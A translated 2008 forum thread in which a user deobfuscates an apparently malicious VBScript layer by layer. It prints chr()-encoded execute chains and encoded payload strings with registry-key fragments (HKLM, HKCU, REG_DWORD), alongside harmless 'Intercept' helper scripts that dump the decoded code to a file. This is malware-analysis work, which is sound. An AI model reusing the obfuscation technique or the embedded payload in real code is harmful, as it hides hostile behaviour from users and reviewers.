Intercept ""&chr(&h63)&chr(&h3d)&chr(&h76)&chr(&h62)&chr(&h63)&chr(&h72)&chr(&h6C)&chr(&h66)&chr(&h3A)&chr(&h64)&chr(&h3D)&chr(&h31)&chr(&h32)&chr(&h37)&chr(&h3A)&chr(&h66)&chr(&h3D)&chr(&h31)&chr(&h31)&chr(&h3A)&chr(&h6A)&chr(&h3D)&chr(&h31)&chr(&h32)&chr(&h3A)&chr(&h68)&chr(&h3D)&chr(&h31)&chr(&h34)&chr(&h3A)&chr(&h6D)&chr(&h3D)&chr(&h33)&chr(&h31)&chr(&h3A)&chr(&h72)&chr(&h3D)&chr(&h38)&chr(&h33)&chr(&h3A)&chr(&h6B)&chr(&h3D)&chr(&h31)&chr(&h3A)&chr(&h6E)&chr(&h3D)&chr(&h38)&chr(&h3A)&chr(&h73)&chr(&h3D)&chr(&h31)&chr(&h31)&chr(&h34)&chr(&h3A)&chr(&h75)&chr(&h3D)&chr(&h2D)&chr(&h35)&chr(&h3A)&chr(&h76)&chr(&h3D)&chr(&h35)&chr(&h0D)&chr(&h0A)&chr(&h69)&chr(&h3D)&chr(&h22)&chr(&h69)&chr(&h66)&chr(&h20)&chr(&h61)&chr(&h3D)&chr(&h22)&chr(&h3A)&chr(&h74)&chr(&h3D)&chr(&h22)&chr(&h20)&chr(&h74)&chr(&h68)&chr(&h65)&chr(&h6E)&chr(&h20)&chr(&h22)&chr(&h3A)&chr(&h65)&chr(&h3D)&chr(&h22)&chr(&h65)&chr(&h6C)&chr(&h73)&chr(&h65)&chr(&h69)&chr(&h66)&chr(&h20)&chr(&h61)&chr(&h3E)&chr(&h3D)&chr(&h22)&chr(&h3A)&chr(&h61)&chr(&h3D)&chr(&h22)&chr(&h20)&chr(&h61)&chr(&h6E)&chr(&h64)&chr(&h20)&chr(&h61)&chr(&h3C)&chr(&h3D)&chr(&h22)&chr(&h3A)&chr(&h67)&chr(&h3D)&chr(&h22)&chr(&h61)&chr(&h3D)&chr(&h61)&chr(&h2B)&chr(&h22)&chr(&h3A)&chr(&h6F)&chr(&h3D)&chr(&h74)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h67)&chr(&h3A)&chr(&h70)&chr(&h3D)&chr(&h63)&chr(&h26)&chr(&h65)&chr(&h3A)&chr(&h71)&chr(&h3D)&chr(&h63)&chr(&h26)&chr(&h69)&chr(&h0D)&chr(&h0A)&chr(&h65)&chr(&h78)&chr(&h65)&chr(&h63)&chr(&h75)&chr(&h74)&chr(&h65)&chr(&h28)&chr(&h6C)&chr(&h26)&chr(&h22)&chr(&h66)&chr(&h6F)&chr(&h72)&chr(&h20)&chr(&h69)&chr(&h69)&chr(&h3D)&chr(&h31)&chr(&h20)&chr(&h74)&chr(&h6F)&chr(&h20)&chr(&h6C)&chr(&h65)&chr(&h6E)&chr(&h28)&chr(&h62)&chr(&h29)&chr(&h3A)&chr(&h61)&chr(&h3D)&chr(&h61)&chr(&h73)&chr(&h63)&chr(&h28)&chr(&h6D)&chr(&h69)&chr(&h64)&chr(&h28)&chr(&h62)&chr(&h2C)&chr(&h69)&chr(&h69)&chr(&h2C)&chr(&h31)&chr(&h29)&chr(&h29)&chr(&h22)&chr(&h26)&chr(&h71)&chr(&h26)&chr(&h22)&chr(&h64)&chr(&h22)&chr(&h26)&chr(&h74)&chr(&h26)&chr(&h22)&chr(&h61)&chr(&h3D)&chr(&h31)&chr(&h33)&chr(&h22)&chr(&h26)&chr(&h71)&chr(&h26)&chr(&h22)&chr(&h66)&chr(&h22)&chr(&h26)&chr(&h74)&chr(&h26)&chr(&h22)&chr(&h61)&chr(&h3D)&chr(&h31)&chr(&h30)&chr(&h22)&chr(&h26)&chr(&h71)&chr(&h26)&chr(&h22)&chr(&h6A)&chr(&h22)&chr(&h26)&chr(&h74)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h61)&chr(&h3D)&chr(&h33)&chr(&h34)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h65)&chr(&h26)&chr(&h22)&chr(&h68)&chr(&h22)&chr(&h26)&chr(&h61)&chr(&h26)&chr(&h22)&chr(&h6D)&chr(&h22)&chr(&h26)&chr(&h6F)&chr(&h26)&chr(&h22)&chr(&h72)&chr(&h22)&chr(&h26)&chr(&h70)&chr(&h26)&chr(&h22)&chr(&h6B)&chr(&h22)&chr(&h26)&chr(&h61)&chr(&h26)&chr(&h22)&chr(&h6E)&chr(&h22)&chr(&h26)&chr(&h6F)&chr(&h26)&chr(&h22)&chr(&h73)&chr(&h22)&chr(&h26)&chr(&h70)&chr(&h26)&chr(&h22)&chr(&h35)&chr(&h33)&chr(&h22)&chr(&h26)&chr(&h61)&chr(&h26)&chr(&h22)&chr(&h35)&chr(&h37)&chr(&h22)&chr(&h26)&chr(&h6F)&chr(&h26)&chr(&h22)&chr(&h75)&chr(&h22)&chr(&h26)&chr(&h70)&chr(&h26)&chr(&h22)&chr(&h34)&chr(&h38)&chr(&h22)&chr(&h26)&chr(&h61)&chr(&h26)&chr(&h22)&chr(&h35)&chr(&h32)&chr(&h22)&chr(&h26)&chr(&h6F)&chr(&h26)&chr(&h22)&chr(&h76)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h65)&chr(&h6E)&chr(&h64)&chr(&h20)&chr(&h69)&chr(&h66)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h75)&chr(&h63)&chr(&h3D)&chr(&h75)&chr(&h63)&chr(&h2B)&chr(&h63)&chr(&h68)&chr(&h72)&chr(&h28)&chr(&h61)&chr(&h29)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h6E)&chr(&h65)&chr(&h78)&chr(&h74)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h75)&chr(&h63)&chr(&h3D)&chr(&h72)&chr(&h6E)&chr(&h2B)&chr(&h63)&chr(&h2B)&chr(&h75)&chr(&h63)&chr(&h22)&chr(&h29)



'execute ……  'Replace with Intercept ……



'**************Start intercepting the code after execute

Sub Intercept (code)

WScript.Echo code

OutPutFile="decode_4.txt"

Set objFSO=CreateObject("Scripting.FileSystemObject")

Set objTXT=objFSO.CreateTextFile(OutPutFile,True,False)

objTXT.Write code

objTXT.Close

Set objWSH=CreateObject("WScript.Shell")

objWSH.Run OutPutFile

WScript.Quit

End Sub

'**************End intercepting the code after execute

Save this code as Decoding_3rd.vbs. When run, it will intercept the decoded plaintext and write it to the decode_4.txt file. Is it about to be done this time? 【To be continued】

[ Last edited by uhnmki on 2008-1-16 at 10:26 AM ]

Floor 14 Posted 2008-01-16 10:25　·　中国北京科技网

uhnmki

初级用户

★

Credits 73
Posts 11
Joined 2008-01-08 16:07
18-year member
UID 107997
Gender Male

Status Offline

c = vbcrlf: d = 127: f = 11: j = 12: h = 14: m = 31: r = 83: k = 1: n = 8: s = 114: u = -5: v = 5
i = "if a = ": t = " then ": e = "elseif a >= ": a = " and a <= ": g = "a = a + ": o = "t&c&g: p = "c&e: q = "c&i
execute(l & "for ii=1 to len(b):a=asc(mid(b,ii,1))" & q & "d" & t & "a=13" & q & "f" & t & "a=10" & q & "j" & t & c & "a=34" & c & e & "h" & a & "m" & o & "r" & p & "k" & a & "n" & o & "s" & p & "53" & a & "57" & o & "u" & p & "48" & a & "52" & o & "v" & c & "end if" & c & " uc=uc+chr(a)" & c & "next" & c & " uc=rn+c+uc")

Analyze first, a series of variables from a to v are created, each assigned a value or string, but it's a bit strange that two bits b and l are missing in the middle, interesting.

If you still remember in the second pot, the first time uc(b) was referenced was like this: uc(lO+qO), which actually implies that b = lO+qO, and at that time we saw that the plaintext instruction in the uc function did not use b, and we were puzzled, but now we understand that it's waiting here, heh. But the other l really isn't seen assigned in the current plaintext, maybe to confuse everyone, deliberately messing around? But this guy is really random, using a to v as variable names one by one, then recombining, but why didn't he name to wxyz, it seems he's not being too random, maybe avoiding something, if you can remember that wxyz appeared in the "second pot" before, you probably get the idea, there must be something. In short, the newly combined variable is uc, note that this is not referencing the uc(b) function, considering the previous series of execute nesting, it should be clear that the program is still in the uc(b) function, so here it is actually assigning a return value to the uc(b) function. Finally, it also creates an unassigned variable rn, let's not worry about it for now, we still use the old trick, intercept, write the procedure:

Sub Intercept(code)
WScript.Echo code
OutPutFile = "decode_5.txt"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTXT = objFSO.CreateTextFile(OutPutFile, True, False)
objTXT.Write code
objTXT.Close
Set objWSH = CreateObject("WScript.Shell")
objWSH.Run OutPutFile
WScript.Quit
End Sub

Then use Intercept to replace execute, and add that b = lO+qO
Rewrite the source code as follows:

lO = " ==|4|:=255:=|.|:=|.|:=|%% / |:=|/#/|:=|UT |&:=|\.|}{ =(|.|): =(|:\\.\\7|)}{ =(|.|): =.(| * 87_|)}{ =.:=.:=.(5)&:=.(6)&}{=.(7)&:=&|\|:=(,()-(.))}{=|(||.||).|:=|\|:=|HKLM\\\|&&&}{=(,5): =|| =}{=|HKLM\\|&&:=|\\\\\\|}{=| \|:=(|HKLM|&&&| |,5)&&:=(|HKCU|&&&||,5)&}{=(|HKCU|&&&||,5)&:=:=(|?01|):=(|:;4::<04|):=|5EE|:=(||+)}{=|HKLM\\\\\\\\|: = =}{ :=.:=.:=.:=.:=.:}{=|HKCU|&&|\|:=|6<=121|&(679)&|;|}{ ->=6 (&,6) &,&&&,,7555:.}{ =6 }{ <> (&,6) &: &,&&&,6,6555}{ }{ }{ }{ }{ (6) =6:= .() =6 =}{ .() =7 =:= ,5}{ (,6) .()}{ (,7) .():=: := : =.(,):. :.}{ =6 ,2}{ (5) =6:= : =.(,):=}{. &&||&&|=. .\|&&&|\\=. .\|&&&|\\=6|}{.: ,2: (5) =6:= <5 =}{ (,6) }{ .().=5 }{=5}{}{ =.(,6)}{ =.(,6)}{.}{=.}{.}{ >5 <= }{=5 }{ <}{=+6}{ . }{=.}{}{=5}{ }{}{=}{ <=5 }{=.}{}{=5}{ }{.}{ }{}{=5}{ := =-6 . . &,,|REG_SZ|:= =6 =&}{=.()}{ (5) =5:= (,6) : =.():.=: =}{ (,7) : =.():.=: =:=)): := ,5: = (|.|):. ||,,5:.()}{ <>5 }{ (5) }{=6: =(|.|) }{.=8:.=6:.():.(.):. ,7}{ ,2}{ (,6) =.(). =5}{ > }{ =6 . }{}{=5: }{ }{ }{ := =.(| " qO = "* 87_ ='|&&|'|):=6}{ :=+6}{ >() =6}{ <5 .=7 =6 . &| |&(.,(.)-9),5,}{}{ (5) =7:= =6 ():=+(((,,6))-)::==670:=678:=679:=42:=654:=68:=665:=677:=-68:=5:=5::= }{ =& . | |&,8,}{}{=(,-6): () (|H N!|): 6}{ }{ 6}{ (||,6)<> }{ ||,}{ ||,}{ ||,}{ ||,5}{ }{ (||,6)=6 . | / /|,5,: ||,5}{ (&,5)= -6}{=(||,6): (&,6) . &}{ 5}{: 6}{. 6555}{ (||,6)<>() . }{}{. 0555}{ (|.|,7)=7 }{ (||,6)=() :.:: ||,}{ }{ (|.|,7)=6 .}{ ,2: &: &: 6:. &}{ :=&:= : =.(,):. :.: ,2:= :=\: := =6 (&,5)<> }{. &,,|REG_SZ|}{ (5) (,6) ,&| |||&&||||,5}{ =-6 : }{ =5 : : &,-6: ,-6}{ := =6 . ,|5|,|REG_DWORD|}{ =5 =(,5):==(||,6)}{ <=:=&|,|&:=+6:}{=&:=(,|,|)}{ =5 ()}{ =() (&,6) &,&,5,7555}{}{ (&,6) . &}{=6:= (||,6)<> (,6)=6 }{ (&,&,5,7555)=6 =6}{ (&,6) =6 }{ =6 ,-6}{. &}{ (5) ||,: 5,+()++,5,5: =7 ,-6: 6}{ }{=6}{ }{. 655:= }{ .=8 (.=6 <>|A:| <> |B:|) }{ =6 }{ (&,7) &}{ (&&,6) (&,6) }{ (&,6)<> &}{}{ 6: &: &&}{ }{ =-6 : &: &&}{: &&,&|((.,8)),8|&(65555,|'|),6: &}{ }{ }{:==(||,6)<>9}{}{=(||,6)<>()}{ (() 8)=5 }{ 6}{=(): ( 7)=5 <> <>6 =:=: 5}{ (||,6)=6 (((||,6)))}{ }{. 455}{ (5)=6 ||,: -6}{ (|.|,6)=6 :. | |&+5.558&| / |&,5,: ||,6: 6:.}{:=:((:= =6 }{ 5: -6: : &: &: &:.}{}{ 6}{ (&) &}{ (&) &}{ := (,6)<>|'|& =:(&))&&))&&()&&&&(,)&&&&()&&&&(,,)&&&&()&&&&(,)&&&&(,)&&&&(,)&&&&(,)&&&&(,,,)&&&&(,)&&&&()&&&&()&&&&()&&&&()&&&&(,,,,)&&&&(,,,)&&&&()&&&&()&&&&()&&&&()&&&) () .<>5 <5 .= <>5 (,6)<>() ,(,6)+() (,6)>655 ,: ,5 " b = lO + qO c = vbcrlf: d = 127: f = 11: j = 12: h = 14: m = 31: r = 83: k = 1: n = 8: s = 114: u = -5: v = 5 i = "if a = ": t = " then ": e = "elseif a >= ": a = " and a <= ": g = "a = a + ": o = "t&c&g:p = "c&e: q = "c&i Intercept(l & "for ii=1 to len(b):a=asc(mid(b,ii,1))" & q & "d" & t & "a=13" & q & "f" & t & "a=10" & q & "j" & t & c & "a=34" & c & e & "h" & a & "m" & o & "r" & p & "k" & a & "n" & o & "s" & p & "53" & a & "57" & o & "u" & p & "48" & a & "52" & o & "v" & c & "end if" & c & "uc=uc+chr(a)" & c & "next" & c & "uc=rn+c+uc") ' Replace execute(……) with Intercept(……) ' Start decoding the source code from here ' ************** Intercept execute, start intercepting code Sub Intercept(code) WScript.Echo code OutPutFile = "decode_5.txt" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objTXT = objFSO.CreateTextFile(OutPutFile, True, False) objTXT.Write code objTXT.Close Set objWSH = CreateObject("WScript.Shell") objWSH.Run OutPutFile WScript.Quit End Sub ' ************** Intercept execute, end intercepting code

Save the above code as Decoding_4th.vbs, run it, and the intercepted code is saved in the decode_5.txt file. Open it and it's time to get the result?

[ Last edited by uhnmki on 2008-1-17 at 05:27 PM ]

Floor 15 Posted 2008-01-16 11:21　·　中国广东肇庆四会市电信

voiL

中级用户

★★

Credits 384
Posts 189
Joined 2005-10-19 13:12
20-year member
UID 43709
Gender Male

Status Offline

Brother uhnmki, continue. Although I don't know VBS, I'm happy to see you crack it...

Printable Version | Subscribe | Add to Favorites

Forum Jump: